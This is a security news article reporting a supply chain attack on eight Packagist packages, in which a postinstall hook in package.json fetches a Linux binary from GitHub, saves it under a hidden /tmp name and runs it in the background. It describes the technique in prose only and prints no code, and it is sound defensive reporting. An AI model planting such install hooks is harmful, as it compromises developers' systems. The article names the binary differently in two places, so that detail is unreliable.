Close Menu
Most Read

Packagist supply chain attack infects packages via GitHub malware

Staff WriterBy No Comments2 Mins Read0 Views

Essential Insights

  1. A coordinated supply chain attack compromised eight PHP and JavaScript packages on Packagist by injecting malicious code into package.json files, leading to the execution of a Linux binary from GitHub.
  2. The malicious script downloads and executes a binary named "gvfsd-network" from GitHub, which disables TLS verification, suppresses errors, and runs in the background, enabling remote code execution.
  3. The attacker spread the payload across 777 GitHub files, including workflow scripts, indicating a broad campaign leveraging various mechanisms for persistence and payload execution.

Threat, Techniques, and Targets

A recent supply chain attack affected eight packages on Packagist. The attacker inserted malicious code into the package.json files. This code was designed to run a Linux binary from a GitHub Releases URL. The attack targeted projects that use JavaScript build tools and PHP code together. The malicious code was hidden in packages that developers might overlook. Instead of modifying composer.json, the attacker chose package.json. They changed the upstream repositories to include a postinstall script. This script downloads a Linux binary named “systemd-network-helper” from GitHub. It saves the binary to “/tmp/.sshd,” sets permissions for everyone to execute, and then runs it in the background. The attack is coordinated and seems part of a larger campaign. Files in GitHub also contain references to the malware payload. The attack targeted a broad set of repositories and involved multiple methods to run the malicious code.

Impact, Security Implications, and Remediation Guidance

The malicious activity can cause serious security issues. The downloaded binary could execute remote commands or install additional malware. This can lead to compromises of affected environments. The activity also suggests that attackers can hide malicious code within libraries used in software projects. Because the payload’s exact functionality is unclear and the relevant GitHub account no longer exists, understanding the full impact is difficult. Blocking the malicious code is advised to prevent compromise. Developers and security teams should consult with their vendors or relevant authorities for specific remediation steps. It is important to remove affected packages and review project dependencies carefully. Regular updates, monitoring for unusual activity, and verifying package sources can help prevent future attacks.

Stay Ahead with the Latest Tech Trends

Learn how the Internet of Things (IoT) is transforming everyday life.

Stay inspired by the vast knowledge available on Wikipedia.

ThreatIntel-V1

Share.
Avatar photo

John Marcelli is a staff writer for the CISO Brief, with a passion for exploring and writing about the ever-evolving world of technology. From emerging trends to in-depth reviews of the latest gadgets, John stays at the forefront of innovation, delivering engaging content that informs and inspires readers. When he's not writing, he enjoys experimenting with new tech tools and diving into the digital landscape.

Related Posts

Comments are closed.